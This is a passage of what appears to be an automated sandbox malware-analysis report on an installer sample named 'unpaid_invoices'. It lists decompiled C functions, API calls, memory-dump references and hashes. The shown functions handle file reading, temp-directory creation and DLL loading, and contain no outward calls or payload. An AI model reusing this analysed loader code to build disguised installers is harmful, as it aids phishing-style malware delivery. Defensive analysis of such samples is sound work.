					_t48 =  *0x40ce6c; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}













              0x0040348f
              0x004034a2
              0x004034a7
              0x004035d7
              0x004035d9
              0x00000000
              0x004035df
              0x004034b3
              0x004034c6
              0x004034cc
              0x004034d2
              0x004034dd
              0x004034e2
              0x004034e7
              0x004034ef
              0x004034f1
              0x004034f1
              0x004034fa
              0x00403501
              0x00000000
              0x00000000
              0x00403507
              0x0040350d
              0x00403513
              0x00000000
              0x00403519
              0x0040351f
              0x0040353f
              0x00403544
              0x00403549
              0x0040354f
              0x00403555
              0x00403566
              0x00000000
              0x00000000
              0x00403568
              0x0040356e
              0x00403570
              0x00403593
              0x00403599
              0x00000000
              0x00000000
              0x0040359b
              0x0040359d
              0x00000000
              0x00000000
              0x0040359f
              0x0040359f
              0x004035b2
              0x00000000
              0x00000000
              0x004035c1
              0x00000000
              0x004035c1
              0x0040357a
              0x00403581
              0x004035ce
              0x004035d4
              0x004035d4
              0x00000000
              0x004035d4
              0x00403583
              0x00403589
              0x0040358f
              0x00000000
              0x00000000
              0x00000000
              0x004035d2
              0x004035d2
              0x00000000
              0x004035d2
              0x00000000

              APIs
              • GetTickCount.KERNEL32 ref: 00403493
                • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
              • SetFilePointer.KERNELBASE(?,00000000,00000000,/ky,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FilePointer$CountTick
              • String ID: /ky$07y$ex
              • API String ID: 1092082344-1542368883
              • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
              • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
              • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
              • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004069CB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 556 4069cb-4069eb GetSystemDirectoryW 557 4069ed 556->557 558 4069ef-4069f1 556->558 557->558 559 406a02-406a04 558->559 560 4069f3-4069fc 558->560 562 406a05-406a38 wsprintfW LoadLibraryExW 559->562 560->559 561 4069fe-406a00 560->561 561->562
              C-Code - Quality: 100%
              			E004069CB(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








              0x004069e2
              0x004069eb
              0x004069ed
              0x004069ed
              0x004069f1
              0x00406a04
              0x004069fe
              0x004069fe
              0x004069fe
              0x00406a1d
              0x00406a31
              0x00406a38

              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
              • wsprintfW.USER32 ref: 00406A1D
              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%S.dll$UXTHEME$\
              • API String ID: 2200240437-1946221925
              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405B9F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 563 405b9f-405bea CreateDirectoryW 564 405bf0-405bfd GetLastError 563->564 565 405bec-405bee 563->565 566 405c17-405c19 564->566 567 405bff-405c13 SetFileSecurityW 564->567 565->566 567->565 568 405c15 GetLastError 567->568 568->566
              C-Code - Quality: 100%
              			E00405B9F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







              0x00405baa
              0x00405bae
              0x00405bb1
              0x00405bb7
              0x00405bbb
              0x00405bbf
              0x00405bc7
              0x00405bce
              0x00405bd4
              0x00405bdb
              0x00405be2
              0x00405bea
              0x00405bec
              0x00000000
              0x00405bec
              0x00405bf6
              0x00405bfd
              0x00405c13
              0x00000000
              0x00000000
              0x00000000
              0x00405c15
              0x00405c19

              APIs
              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
              • GetLastError.KERNEL32 ref: 00405BF6
              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
              • GetLastError.KERNEL32 ref: 00405C15
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 3449924974-3081826266
              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040618D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 569 40618d-406199 570 40619a-4061ce GetTickCount GetTempFileNameW 569->570 571 4061d0-4061d2 570->571 572 4061dd-4061df 570->572 571->570 573 4061d4 571->573 574 4061d7-4061da 572->574 573->574
              C-Code - Quality: 100%
              			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












              0x00406193
              0x00406199
              0x0040619a
              0x0040619a
              0x0040619f
              0x004061a0
              0x004061a3
              0x004061a8
              0x004061ab
              0x004061b5
              0x004061c2
              0x004061c6
              0x004061ce
              0x00000000
              0x00000000
              0x004061d2
              0x00000000
              0x004061d4
              0x004061d4
              0x004061d4
              0x004061d7
              0x004061da
              0x004061da
              0x004061dd
              0x00000000

              APIs
              • GetTickCount.KERNEL32 ref: 004061AB
              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CountFileNameTempTick
              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
              • API String ID: 1716503409-678247507
              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403C2B Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 575 403c2b-403c3a 576 403c46-403c4e 575->576 577 403c3c-403c3f CloseHandle 575->577 578 403c50-403c53 CloseHandle 576->578 579 403c5a-403c66 call 403c88 call 405d7a 576->579 577->576 578->579 583 403c6b-403c6c 579->583
              C-Code - Quality: 100%
              			E00403C2B() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C88();
				_t4 = E00405D7A(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsn7D59.tmp\\", 7); // executed
				return _t4;
			}







              0x00403c2b
              0x00403c3a
              0x00403c3d
              0x00403c3f
              0x00403c3f
              0x00403c46
              0x00403c4e
              0x00403c51
              0x00403c53
              0x00403c53
              0x00403c53
              0x00403c5a
              0x00403c66
              0x00403c6c

              APIs
              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C3D
              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C51
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
              • C:\Users\user\AppData\Local\Temp\nsn7D59.tmp\, xrefs: 00403C61
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsn7D59.tmp\
              • API String ID: 2962429428-954555714
              • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
              • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
              • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
              • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403377 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 584 403377-403384 585 4033a2-4033ab call 40347f 584->585 586 403386-40339c SetFilePointer 584->586 589 4033b1-4033c4 call 4061e1 585->589 590 403479-40347c 585->590 586->585 593 403469 589->593 594 4033ca-4033dd call 40347f 589->594 596 40346b-40346c 593->596 598 4033e3-4033e6 594->598 599 403477 594->599 596->590 600 403445-40344b 598->600 601 4033e8-4033eb 598->601 599->590 602 403450-403467 ReadFile 600->602 603 40344d 600->603 601->599 604 4033f1 601->604 602->593 605 40346e-403471 602->605 603->602 606 4033f6-403400 604->606 605->599 607 403402 606->607 608 403407-403419 call 4061e1 606->608 607->608 608->593 611 40341b-403422 call 406210 608->611 613 403427-403429 611->613 614 403441-403443 613->614 615 40342b-40343d 613->615 614->596 615->606 616 40343f 615->616 616->599
              C-Code - Quality: 92%
              			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x7a8af8;
					 *0x79f734 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040347F(4);
				if(_t22 >= 0) {
					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x79f734 =  *0x79f734 + 4;
						_t36 = E0040347F(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x79f734 =  *0x79f734 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
											goto L18;
										}
										_t30 = E00406210(_a8, 0x793730, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x79f734 =  *0x79f734 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














              0x0040337b
              0x00403384
              0x0040338d
              0x00403391
              0x0040339c
              0x0040339c
              0x004033a4
              0x004033ab
              0x004033bd
              0x004033c4
              0x00403469
              0x00403469
              0x00000000
              0x004033ca
              0x004033cd
              0x004033d9
              0x004033dd
              0x00403477
              0x00403477
              0x004033e3
              0x004033e6
              0x00403445
              0x0040344b
              0x0040344d
              0x0040344d
              0x0040345f
              0x00403467
              0x0040346e
              0x00403471
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004033e8
              0x004033eb
              0x00000000
              0x004033f1
              0x004033f6
              0x004033fd
              0x00403400
              0x00403402
              0x00403402
              0x0040340f
              0x00403419
              0x00000000
              0x00000000
              0x00403422
              0x00403429
              0x00403441
              0x0040346b
              0x0040346b
              0x0040342b
              0x0040342b
              0x0040342e
              0x00403431
              0x00403437
              0x0040343d
              0x00000000
              0x0040343f
              0x00000000
              0x0040343f
              0x0040343d
              0x00000000
              0x00403429
              0x00000000
              0x004033f6
              0x004033eb
              0x004033e6
              0x004033dd
              0x004033c4
              0x00403479
              0x0040347c

              APIs
              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FilePointer
              • String ID: 07y
              • API String ID: 973152223-1660179758
              • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
              • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
              • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
              • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 617 4015c1-4015d5 call 402da6 call 405fe8 622 401631-401634 617->622 623 4015d7-4015ea call 405f6a 617->623 625 401663-4022f6 call 401423 622->625 626 401636-401655 call 401423 call 40666e SetCurrentDirectoryW 622->626 631 401604-401607 call 405c1c 623->631 632 4015ec-4015ef 623->632 641 402c2a-402c39 625->641 642 40292e-402935 625->642 626->641 644 40165b-40165e 626->644 640 40160c-40160e 631->640 632->631 637 4015f1-4015f8 call 405c39 632->637 637->631 648 4015fa-4015fd call 405b9f 637->648 645 401610-401615 640->645 646 401627-40162f 640->646 642->641 644->641 649 401624 645->649 650 401617-401622 GetFileAttributesW 645->650 646->622 646->623 653 401602 648->653 649->646 650->646 650->649 653->640
              C-Code - Quality: 86%
              			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE8(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F6A(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C1C( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B9F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











              0x004015c1
              0x004015c9
              0x004015cc
              0x004015d1
              0x004015d5
              0x004015d7
